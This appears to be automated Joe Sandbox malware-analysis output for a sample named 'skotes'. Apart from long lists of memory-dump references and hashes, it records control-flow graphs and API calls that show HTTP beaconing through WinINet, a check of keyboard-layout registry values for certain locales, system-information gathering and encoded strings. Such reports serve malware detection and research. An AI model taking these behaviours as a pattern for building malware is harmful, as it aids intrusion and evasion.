                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile$CreateDirectory
                                                                                                                                            • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 1875963930-2267310118
                                                                                                                                            • Opcode ID: c69dce03d02a1bb0421c828de1bcfa1157a37f04ff74c34b1481a62030040e5d
                                                                                                                                            • Instruction ID: 2d57e5a43f1c215a1989aae185fcb2f15fb1720a134d5b11a6dffcc03cad0d16
                                                                                                                                            • Opcode Fuzzy Hash: c69dce03d02a1bb0421c828de1bcfa1157a37f04ff74c34b1481a62030040e5d
                                                                                                                                            • Instruction Fuzzy Hash: 46F24A71A101489FEB1CDB38CE89BDDBB72AF41304F50819DE44AA73D6DB359AC48B91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1230 acbe30-acbe7c 1231 acc281-acc2a6 call ad80c0 1230->1231 1232 acbe82-acbe86 1230->1232 1238 acc2a8-acc2b4 1231->1238 1239 acc2d4-acc2ec 1231->1239 1232->1231 1233 acbe8c-acbe90 1232->1233 1233->1231 1235 acbe96-acbf2a Sleep InternetOpenW InternetConnectA call ad7a00 call ac5c10 1233->1235 1263 acbf2c 1235->1263 1264 acbf2e-acbf4a HttpOpenRequestA 1235->1264 1243 acc2ca-acc2d1 call add663 1238->1243 1244 acc2b6-acc2c4 1238->1244 1240 acc238-acc250 1239->1240 1241 acc2f2-acc2fe 1239->1241 1249 acc256-acc262 1240->1249 1250 acc323-acc33f call adcff1 1240->1250 1247 acc22e-acc235 call add663 1241->1247 1248 acc304-acc312 1241->1248 1243->1239 1244->1243 1245 acc34f-acc354 call af6c6a 1244->1245 1247->1240 1248->1245 1254 acc314 1248->1254 1255 acc268-acc276 1249->1255 1256 acc319-acc320 call add663 1249->1256 1254->1247 1255->1245 1262 acc27c 1255->1262 1256->1250 1262->1256 1263->1264 1268 acbf4c-acbf5b 1264->1268 1269 acbf7b-acbfea call ad7a00 call ac5c10 call ad7a00 call ac5c10 1264->1269 1271 acbf5d-acbf6b 1268->1271 1272 acbf71-acbf78 call add663 1268->1272 1282 acbfec 1269->1282 1283 acbfee-acc004 HttpSendRequestA 1269->1283 1271->1272 1272->1269 1282->1283 1284 acc035-acc05d 1283->1284 1285 acc006-acc015 1283->1285 1286 acc08e-acc0af InternetReadFile 1284->1286 1287 acc05f-acc06e 1284->1287 1288 acc02b-acc032 call add663 1285->1288 1289 acc017-acc025 1285->1289 1293 acc0b5 1286->1293 1291 acc084-acc08b call add663 1287->1291 1292 acc070-acc07e 1287->1292 1288->1284 1289->1288 1291->1286 1292->1291 1296 acc0c0-acc170 call af4250 1293->1296
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(000005DC,E6CEA310,?,00000000), ref: 00ACBEB8
                                                                                                                                            • InternetOpenW.WININET(00B18DC8,00000000,00000000,00000000,00000000), ref: 00ACBEC8
                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00ACBEEC
                                                                                                                                            • HttpOpenRequestA.WININET(?,00000000), ref: 00ACBF36
                                                                                                                                            • HttpSendRequestA.WININET(?,00000000), ref: 00ACBFF6
                                                                                                                                            • InternetReadFile.WININET(?,?,000003FF,?), ref: 00ACC0A8
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00ACC187
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00ACC18F
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00ACC197
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                            • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 2167506142-885246636
                                                                                                                                            • Opcode ID: b9434031574b1136a8785243840fdc3fafbed2ef5c1a4c2535f83de882aacab2
                                                                                                                                            • Instruction ID: e67d03d7bd2651f74ed73d8ba57d58a45c0b733afd054777abcf47b3a33becac
                                                                                                                                            • Opcode Fuzzy Hash: b9434031574b1136a8785243840fdc3fafbed2ef5c1a4c2535f83de882aacab2
                                                                                                                                            • Instruction Fuzzy Hash: A8B1F3B1A101189BDB28CF28CC85FEEBBB5EF45314F50819DF50997291DB719AC0CB94

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1676 ac6020-ac619d call ade150 call ad80c0 * 5 RegOpenKeyExA 1689 ac64b1-ac64ba 1676->1689 1690 ac61a3-ac6233 call af40f0 1676->1690 1692 ac64bc-ac64c7 1689->1692 1693 ac64e7-ac64f0 1689->1693 1716 ac649f-ac64ab 1690->1716 1717 ac6239-ac623d 1690->1717 1697 ac64dd-ac64e4 call add663 1692->1697 1698 ac64c9-ac64d7 1692->1698 1694 ac651d-ac6526 1693->1694 1695 ac64f2-ac64fd 1693->1695 1701 ac6528-ac6533 1694->1701 1702 ac6553-ac655c 1694->1702 1699 ac64ff-ac650d 1695->1699 1700 ac6513-ac651a call add663 1695->1700 1697->1693 1698->1697 1703 ac65d7-ac65df call af6c6a 1698->1703 1699->1700 1699->1703 1700->1694 1707 ac6549-ac6550 call add663 1701->1707 1708 ac6535-ac6543 1701->1708 1710 ac655e-ac6569 1702->1710 1711 ac6585-ac658e 1702->1711 1707->1702 1708->1703 1708->1707 1720 ac657b-ac6582 call add663 1710->1720 1721 ac656b-ac6579 1710->1721 1713 ac65bb-ac65d6 call adcff1 1711->1713 1714 ac6590-ac659f 1711->1714 1722 ac65b1-ac65b8 call add663 1714->1722 1723 ac65a1-ac65af 1714->1723 1716->1689 1725 ac6499 1717->1725 1726 ac6243-ac6279 RegEnumValueA 1717->1726 1720->1711 1721->1703 1721->1720 1722->1713 1723->1703 1723->1722 1725->1716 1733 ac627f-ac629e 1726->1733 1734 ac6486-ac648d 1726->1734 1737 ac62a0-ac62a5 1733->1737 1734->1726 1735 ac6493 1734->1735 1735->1725 1737->1737 1738 ac62a7-ac62fb call ad80c0 call ad7a00 * 2 call ac5d50 1737->1738 1738->1734
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00AC617D
                                                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00AC6271
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumOpenValue
                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                            • API String ID: 2571532894-3963862150
                                                                                                                                            • Opcode ID: 8eeb502a83fc0ca7a5196c5f52af00dc665ef83d5f5362938381c0626ccc6f82
                                                                                                                                            • Instruction ID: 8778edc67755329c849760463ada44d2cacb08ae57eec5a0b3a1e37669443fec
                                                                                                                                            • Opcode Fuzzy Hash: 8eeb502a83fc0ca7a5196c5f52af00dc665ef83d5f5362938381c0626ccc6f82
                                                                                                                                            • Instruction Fuzzy Hash: C3B1CD719002689BDB24DB24CD89FDEB7B9AF04300F5442D9E509E7291DB74AFE88F94

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1749 ac7d30-ac7db2 call af40f0 1753 ac7db8-ac7de0 call ad7a00 call ac5c10 1749->1753 1754 ac8356-ac8373 call adcff1 1749->1754 1761 ac7de4-ac7e06 call ad7a00 call ac5c10 1753->1761 1762 ac7de2 1753->1762 1767 ac7e08 1761->1767 1768 ac7e0a-ac7e23 1761->1768 1762->1761 1767->1768 1771 ac7e54-ac7e7f 1768->1771 1772 ac7e25-ac7e34 1768->1772 1775 ac7eb0-ac7ed1 1771->1775 1776 ac7e81-ac7e90 1771->1776 1773 ac7e4a-ac7e51 call add663 1772->1773 1774 ac7e36-ac7e44 1772->1774 1773->1771 1774->1773 1777 ac8374 call af6c6a 1774->1777 1781 ac7ed7-ac7edc 1775->1781 1782 ac7ed3-ac7ed5 GetNativeSystemInfo 1775->1782 1779 ac7ea6-ac7ead call add663 1776->1779 1780 ac7e92-ac7ea0 1776->1780 1790 ac8379-ac837f call af6c6a 1777->1790 1779->1775 1780->1777 1780->1779 1786 ac7edd-ac7ee6 1781->1786 1782->1786 1788 ac7ee8-ac7eef 1786->1788 1789 ac7f04-ac7f07 1786->1789 1792 ac7ef5-ac7eff 1788->1792 1793 ac8351 1788->1793 1794 ac7f0d-ac7f16 1789->1794 1795 ac82f7-ac82fa 1789->1795 1797 ac834c 1792->1797 1793->1754 1798 ac7f18-ac7f24 1794->1798 1799 ac7f29-ac7f2c 1794->1799 1795->1793 1800 ac82fc-ac8305 1795->1800 1797->1793 1798->1797 1802 ac82d4-ac82d6 1799->1802 1803 ac7f32-ac7f39 1799->1803 1804 ac832c-ac832f 1800->1804 1805 ac8307-ac830b 1800->1805 1806 ac82d8-ac82e2 1802->1806 1807 ac82e4-ac82e7 1802->1807 1808 ac7f3f-ac7f9b call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ac5d50 1803->1808 1809 ac8019-ac82bd call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ac5d50 call ad7a00 call ac5c10 call ac5730 call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ac5d50 call ad7a00 call ac5c10 call ac5730 call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ac5d50 call ad7a00 call ac5c10 call ac5730 call ad7a00 call ac5c10 call ad7a00 call ac5c10 call ac5d50 call ad7a00 call ac5c10 call ac5730 1803->1809 1812 ac833d-ac8349 1804->1812 1813 ac8331-ac833b 1804->1813 1810 ac830d-ac8312 1805->1810 1811 ac8320-ac832a 1805->1811 1806->1797 1807->1793 1815 ac82e9-ac82f5 1807->1815 1834 ac7fa0-ac7fa7 1808->1834 1849 ac82c3-ac82cc 1809->1849 1810->1811 1817 ac8314-ac831e 1810->1817 1811->1793 1812->1797 1813->1793 1815->1797 1817->1793 1836 ac7fa9 1834->1836 1837 ac7fab-ac7fcb call af8bbe 1834->1837 1836->1837 1843 ac7fcd-ac7fdc 1837->1843 1844 ac8002-ac8004 1837->1844 1846 ac7fde-ac7fec 1843->1846 1847 ac7ff2-ac7fff call add663 1843->1847 1848 ac800a-ac8014 1844->1848 1844->1849 1846->1790 1846->1847 1847->1844 1848->1849 1849->1795 1851 ac82ce 1849->1851 1851->1802
                                                                                                                                            APIs
                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AC7ED3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
